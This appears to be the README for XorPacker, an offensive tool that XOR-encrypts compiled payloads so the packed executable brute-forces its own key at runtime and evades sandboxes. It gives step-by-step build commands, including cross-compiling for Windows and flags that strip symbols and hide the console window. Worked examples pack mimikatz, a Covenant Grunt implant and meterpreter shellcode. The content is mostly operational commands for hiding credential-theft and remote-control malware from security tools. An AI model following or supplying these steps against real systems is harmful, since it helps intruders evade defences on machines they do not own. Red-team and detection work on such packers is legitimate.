XorPacker encrypts regularly compiled payloads. The resulting PE uses a bruteforce attack to decrypt the payload and evade sandbox.
- Build Memory Module (x64 version):
apt install cmake
apt install g++-mingw-w64-x86-64 gcc-mingw-w64-x86-64 g++-mingw-w64-i686 gcc-mingw-w64-i686
git clone --recurse-submodules https://github.com/tmenochet/XorPacker
cd XorPacker/MemoryModule
mkdir build; cd build
cmake ..
make MemoryModule
Change the following line in CMakeLists.txt to build x86 version:
set (PLATFORM "i686" CACHE STRING "Platform to compile for")
- Generate the packed PE:
python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED
- Compile the resulting GO code:
apt install golang-go-windows-amd64 golang-go-windows-386
# Build x64 version
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build payload.go
# Build x86 version
GOOS=windows GOARCH=386 CGO_ENABLED=1 CC=i686-w64-mingw32-gcc go build payload.go
Additionally, consider the use of the following flags in the GO build command:
-trimpath
: remove file system paths-ldflags "-w -s"
: strip debug (DWARF) & classic symbols-ldflags "-H=windowsgui"
: hide Terminal window
- Install Donut's Python extension:
pip3 install donut-shellcode
- Generate the packed PE (x64 version):
python3 ./xorpacker.py -f Grunt.exe -t MANAGED -a x64
- Compile the resulting GO code:
GOOS=windows GOARCH=amd64 go build payload.go
- Generate the packed PE:
python3 ./xorpacker.py -f meterpreter.raw -t SHELLCODE
- Compile the resulting GO code:
GOOS=windows GOARCH=amd64 go build payload.go